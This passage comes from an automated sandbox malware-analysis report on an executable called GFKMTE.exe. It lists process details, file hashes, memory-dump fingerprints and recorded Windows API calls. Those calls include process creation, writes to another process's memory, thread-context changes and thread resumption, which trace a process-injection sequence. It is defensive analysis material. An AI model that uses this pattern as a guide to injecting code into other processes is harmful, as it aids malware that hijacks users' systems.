                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                Imagebase:0x650000
                                                                                                                                                File size:177'664 bytes
                                                                                                                                                MD5 hash:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:37
                                                                                                                                                Start time:02:03:30
                                                                                                                                                Start date:09/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7184 -s 80
                                                                                                                                                Imagebase:0x540000
                                                                                                                                                File size:483'680 bytes
                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1445456157.00007FFAACC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC10000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffaacc10000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 6E=
                                                                                                                                                  • API String ID: 0-3739184901
                                                                                                                                                  • Opcode ID: d781343e4f951fc313df8f14160379f8b794350a93b24a97d7394bea4f667398
                                                                                                                                                  • Instruction ID: 3c9088391ffaeb5b86e58a18062ae599c7a99816c9b4ef7a6f47619bc06c4a4d
                                                                                                                                                  • Opcode Fuzzy Hash: d781343e4f951fc313df8f14160379f8b794350a93b24a97d7394bea4f667398
                                                                                                                                                  • Instruction Fuzzy Hash: 71914352A0EBD6CFF7969B3908251B56BD1DF43210B1880BAD48DC71D3ED18EC4A83C1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1445456157.00007FFAACC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC10000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffaacc10000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: J_L;
                                                                                                                                                  • API String ID: 0-1607133157
                                                                                                                                                  • Opcode ID: af18e8efd380f372cb51717a6d0ae7a740ebf6e0f64716a5570ba9425cda5600
                                                                                                                                                  • Instruction ID: 72bace9b0244dc51beb03dd3b21b4724acad913b2f90124cd446df85adf51a1f
                                                                                                                                                  • Opcode Fuzzy Hash: af18e8efd380f372cb51717a6d0ae7a740ebf6e0f64716a5570ba9425cda5600
                                                                                                                                                  • Instruction Fuzzy Hash: 28D1046690EB868FF75A9B2858165B47FE1EF53210B0941FFD18DC71E3DA18AC49C382
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1445456157.00007FFAACC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC10000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffaacc10000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: J_L;
                                                                                                                                                  • API String ID: 0-1607133157
                                                                                                                                                  • Opcode ID: f940b993369a7922fe795738f5b76931b0566676431d21b0a0f49426ea339ba5
                                                                                                                                                  • Instruction ID: c91c875610804a4d963d7217b274d396dd28c2a2f0a0fc72af1e68c91526828c
                                                                                                                                                  • Opcode Fuzzy Hash: f940b993369a7922fe795738f5b76931b0566676431d21b0a0f49426ea339ba5
                                                                                                                                                  • Instruction Fuzzy Hash: 363155AAE1FB878BF7599B2A482607866D0EF53210B1840BED64EC30D3DD19EC0D83C1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1445456157.00007FFAACC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC10000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffaacc10000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9fffa85f1ccba7d5f207df9cae2a6093979268ab8203da71d4bdcabc027d67dd
                                                                                                                                                  • Instruction ID: 3afb63a984ecd1090bcd0ee265d157979b221b94c6f1fedbec1a7485315d3ce8
                                                                                                                                                  • Opcode Fuzzy Hash: 9fffa85f1ccba7d5f207df9cae2a6093979268ab8203da71d4bdcabc027d67dd
                                                                                                                                                  • Instruction Fuzzy Hash: A9D1476290EA8A8FF756EB6D88155B5BBA0EF42314B4800BEE44DC71D3DA18EC09C391
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1444828161.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffaacb40000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                  • Instruction ID: d06cb320361b13ded840ff1a2540a5049fe41d2776c2545dc42fd516e1cbe298
                                                                                                                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                  • Instruction Fuzzy Hash: C401677111CB0C8FD744EF0CE451AA6B7E0FB99364F10056DE58AC3691DB36E882CB45
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1444828161.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffaacb40000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9e764ee07f2e26a082b40c54b88a649d4a065bd9b3bd7921d8ac997468c4d21c
                                                                                                                                                  • Instruction ID: d6b950732dac980691065caf9e053be99ff7aeaf33b94339f850c860189f9349
                                                                                                                                                  • Opcode Fuzzy Hash: 9e764ee07f2e26a082b40c54b88a649d4a065bd9b3bd7921d8ac997468c4d21c
                                                                                                                                                  • Instruction Fuzzy Hash: 2D51C2A291E7D3CFE357472CD8A64E67F60EF2362570842B6C0858B0D3EA09880AD7D5

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:19.7%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                  Signature Coverage:10.1%
                                                                                                                                                  Total number of Nodes:238
                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ebe2ca42792e26669fd13a368dc1742223e0a3538bdc6939c07e902878541fb1
                                                                                                                                                  • Instruction ID: a80d0f696c586261f8cdd14bd417d07991bc2f3f25e4cf8be8751cf01ec5724c
                                                                                                                                                  • Opcode Fuzzy Hash: ebe2ca42792e26669fd13a368dc1742223e0a3538bdc6939c07e902878541fb1
                                                                                                                                                  • Instruction Fuzzy Hash: E21247B0D053588FEB22CFA8C894BDDBBF1BF49304F1491AAE448AB251D734A985CF55
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9b5fbb8e4adb6fac3315f940e5fdf846fa1102128d022ea2172e535a5d5d89ec
                                                                                                                                                  • Instruction ID: 9334ab09cb0e01fb86051df43ba1119804fe437edfcc7f924955cbf994a0c860
                                                                                                                                                  • Opcode Fuzzy Hash: 9b5fbb8e4adb6fac3315f940e5fdf846fa1102128d022ea2172e535a5d5d89ec
                                                                                                                                                  • Instruction Fuzzy Hash: EE0212B0D01328CFEB25CFA8C884B9DBBF1BF49305F1491AAE418AB251D734A985CF55
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e2da1e64c697b77900c4bdbd1967a21a8defd448893b36ca0d5436c4821f4686
                                                                                                                                                  • Instruction ID: 7d99eb69e2434ea5c32bde3be5023f7162d968d0b91e7ed21adb516fb9b55f86
                                                                                                                                                  • Opcode Fuzzy Hash: e2da1e64c697b77900c4bdbd1967a21a8defd448893b36ca0d5436c4821f4686
                                                                                                                                                  • Instruction Fuzzy Hash: 290203B0E00228CFEB25CFA9C884B9DBBF1BF49305F1491AAE419B7251D770A985CF55
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 04E391D7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: 8fedf4a942e897419aa4d0175098eb91c0649ccbfe520bf7d0e4a78a77ac165e
                                                                                                                                                  • Instruction ID: 9471f598e4805def4ecbd9f51c53cb51c088ed6c5ead5d891088dc97a354d076
                                                                                                                                                  • Opcode Fuzzy Hash: 8fedf4a942e897419aa4d0175098eb91c0649ccbfe520bf7d0e4a78a77ac165e
                                                                                                                                                  • Instruction Fuzzy Hash: 5702E2B0E00228CFEB25CFA9C884B9DBBF1BF49305F1491A9E419B7251DB70A985CF55
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 04E391D7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: 66e7608f83166aa02955c6a0f39e852bc725bbb923911e6abd5f37d482fa9082
                                                                                                                                                  • Instruction ID: 632be26f77ee0010c870036351c278811d0f08d16046d33d24aa5052afe076cf
                                                                                                                                                  • Opcode Fuzzy Hash: 66e7608f83166aa02955c6a0f39e852bc725bbb923911e6abd5f37d482fa9082
                                                                                                                                                  • Instruction Fuzzy Hash: D6F1E1B0E00228CFEB25CFA9C884B9DBBF1BF49305F1491A9E419B7251DB74A985CF54
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 04E391D7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: 55f925db1a9028e85ac58207baa4984975b80c41aa968564c333720a7347b827
                                                                                                                                                  • Instruction ID: 050b37760ab90f4b1c8f9180c0709c76180c668be4b35c1ee740d3f255931b74
                                                                                                                                                  • Opcode Fuzzy Hash: 55f925db1a9028e85ac58207baa4984975b80c41aa968564c333720a7347b827
                                                                                                                                                  • Instruction Fuzzy Hash: 38F1E0B0E00228CFEB25CFA9C884B9DBBF1BF49305F1491A9E419B7251DB74A985CF54
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 04E391D7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: aa918d531698db07b79026f45c70bb1030d136728e126a3101936b6ded4fb362
                                                                                                                                                  • Instruction ID: d1b3622903dc8bf64e27fcc6c67f79979f26c1c5e17c399430e2eed0a7ff7993
                                                                                                                                                  • Opcode Fuzzy Hash: aa918d531698db07b79026f45c70bb1030d136728e126a3101936b6ded4fb362
                                                                                                                                                  • Instruction Fuzzy Hash: C1F1E1B0E00228CFEB25CFA9C884B9DBBF1BF49305F1491A9E419B7251DB74A985CF54
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 04E391D7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: 522b411354b723be8e59b464393f70ea2663296c70b74489111b699a013b651a
                                                                                                                                                  • Instruction ID: 343807d268dc784cf621ee3cac8b07c8fa67a2a1f7173a1c42bca1cb1d9572ef
                                                                                                                                                  • Opcode Fuzzy Hash: 522b411354b723be8e59b464393f70ea2663296c70b74489111b699a013b651a
                                                                                                                                                  • Instruction Fuzzy Hash: E3F1E1B0E00228CFEB25CFA9C884B9DBBF1BF49305F1491A9E419B7251DB74A985CF54
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: p
                                                                                                                                                  • API String ID: 0-2181537457
                                                                                                                                                  • Opcode ID: 2d562a603ee99aa82e61b9728440ef6a48f745d6f5731545fbd11cde6b171d37
                                                                                                                                                  • Instruction ID: 19cc8275978d59cb77771891ddf1b2922f77aac8610fd9e09ddd4ef934a95bc3
                                                                                                                                                  • Opcode Fuzzy Hash: 2d562a603ee99aa82e61b9728440ef6a48f745d6f5731545fbd11cde6b171d37
                                                                                                                                                  • Instruction Fuzzy Hash: 8642E274A00218CFEB50DF69C684A8EFBB2BF49315F59D1A5C448AB252CB30DD85CFA5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: p
                                                                                                                                                  • API String ID: 0-2181537457
                                                                                                                                                  • Opcode ID: e0fa2a05b032cd944f390367ebe5b9206e49637feaf7d97ae89be8147e161c4d
                                                                                                                                                  • Instruction ID: 0b7a4cfc6d9abce70d7ca2260c54c5aac1c6db9a60fa4c773051f9d6e69b16f0
                                                                                                                                                  • Opcode Fuzzy Hash: e0fa2a05b032cd944f390367ebe5b9206e49637feaf7d97ae89be8147e161c4d
                                                                                                                                                  • Instruction Fuzzy Hash: 3232C170900218CFEB50DFA9C684A8EFBB2BF48315F55D195D448AB252DB30ED85CFA5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: E
                                                                                                                                                  • API String ID: 0-4189953480
                                                                                                                                                  • Opcode ID: 0d7a4a33754186602ea54ab7c84ea3851bf16a48bc71eb2bab663e18ee4ca262
                                                                                                                                                  • Instruction ID: 160538cfa52fe6ac70ffe453f9937c67d52f0fd2571ab6db2aacb57597ae9620
                                                                                                                                                  • Opcode Fuzzy Hash: 0d7a4a33754186602ea54ab7c84ea3851bf16a48bc71eb2bab663e18ee4ca262
                                                                                                                                                  • Instruction Fuzzy Hash: 1E12D5B0A002598FEB54DF99C684A8EFBF6BF45305F15D1A5D048AB291DB30DC86CF54
                                                                                                                                                  APIs
                                                                                                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 04E3A4F8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryVirtualWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3527976591-0
                                                                                                                                                  • Opcode ID: 044c9724ac7a470a3b0f975521e22a305450f46ecf5208be14a5636cd740a797
                                                                                                                                                  • Instruction ID: fd2f73bba20e5c8197437d70619cbd2197cc651bfae7f2cca5882d7f5916db31
                                                                                                                                                  • Opcode Fuzzy Hash: 044c9724ac7a470a3b0f975521e22a305450f46ecf5208be14a5636cd740a797
                                                                                                                                                  • Instruction Fuzzy Hash: 6D41CAB4D012589FCF10CFA9D984AEEFBF1BB49310F14942AE818B7240D739AA41CB54
                                                                                                                                                  APIs
                                                                                                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 04E3A4F8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryVirtualWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3527976591-0
                                                                                                                                                  APIs
                                                                                                                                                  • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 04E39D52
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryReadVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2834387570-0
                                                                                                                                                  APIs
                                                                                                                                                  • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 04E39D52
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryReadVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2834387570-0
                                                                                                                                                  APIs
                                                                                                                                                  • NtSetContextThread.NTDLL(?,?), ref: 04E3A62F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ContextThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1591575202-0
                                                                                                                                                  APIs
                                                                                                                                                  • NtSetContextThread.NTDLL(?,?), ref: 04E3A62F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ContextThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1591575202-0
                                                                                                                                                  APIs
                                                                                                                                                  • NtResumeThread.NTDLL(?,?), ref: 04E3A291
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                  APIs
                                                                                                                                                  • NtResumeThread.NTDLL(?,?), ref: 04E3A291
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: p
                                                                                                                                                  • API String ID: 0-2181537457
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ea8ff57dc93a95a6926d6074b9323300da59fc719b682c3276a9a0e42cd2c295
                                                                                                                                                  • Instruction ID: 4c700c63331c5a0b2d4b24d0339bda552a4ff63d6a4104777bff4d98376f7507
                                                                                                                                                  • Opcode Fuzzy Hash: ea8ff57dc93a95a6926d6074b9323300da59fc719b682c3276a9a0e42cd2c295
                                                                                                                                                  • Instruction Fuzzy Hash: 56E108B4E042198FDB14DFA9C580AAEFBB2FF89304F248169D415AB395D734AD42CF61
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9b32b66e99e8c368985e7a46204f05024937280c64dafe2c795d7caecf5ef145
                                                                                                                                                  • Instruction ID: 7457aebc41ae709d22582b4a0d977a336a364804d61b3bc57f46e71daf3d2f05
                                                                                                                                                  • Opcode Fuzzy Hash: 9b32b66e99e8c368985e7a46204f05024937280c64dafe2c795d7caecf5ef145
                                                                                                                                                  • Instruction Fuzzy Hash: B8619374E00208DFDB58DFAAD994A9DBBF2BF89300F24946AE415BB365DB319941CF00
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 339d3df94803b9d40146c321c713f1475f56bf43f25fc3cfe25e62376e1c7f4f
                                                                                                                                                  • Instruction ID: db687b1cd84123e5117b74b3c25ff56a7ffce5fe3600d3cc341f4b56359c5a8d
                                                                                                                                                  • Opcode Fuzzy Hash: 339d3df94803b9d40146c321c713f1475f56bf43f25fc3cfe25e62376e1c7f4f
                                                                                                                                                  • Instruction Fuzzy Hash: 8B41DCB1E006189FEB58CF6AC84179EBBF2BFC9300F14D0AAD55CA7255EA341A858F51

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: h`$+$`
                                                                                                                                                  • API String ID: 0-4201317992
                                                                                                                                                  • Opcode ID: fbaa59f179c725b388cc046229665dcc0907b948a21f1ebfac915f1880e54396
                                                                                                                                                  • Instruction ID: d7f198c47f839509bbfe3c12d7031f2ffebed934a3c03046c1ea8f76721dad8d
                                                                                                                                                  • Opcode Fuzzy Hash: fbaa59f179c725b388cc046229665dcc0907b948a21f1ebfac915f1880e54396
                                                                                                                                                  • Instruction Fuzzy Hash: C491E4B4E002188FDB04DFA9C984A9DBBF2FF89301F159069E815AB365DB349D46CF61

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: h`$+$`
                                                                                                                                                  • API String ID: 0-4201317992
                                                                                                                                                  • Opcode ID: 98914f3dc25f308a28cf4f1fbc41b41acfa3bcaccf4d5a12da5b0fb82ed35ad2
                                                                                                                                                  • Instruction ID: 8c9f5daf55f1c642ef62a8f8ab2f7eaa32c848c74ac63e88a76ce84e822a50a2
                                                                                                                                                  • Opcode Fuzzy Hash: 98914f3dc25f308a28cf4f1fbc41b41acfa3bcaccf4d5a12da5b0fb82ed35ad2
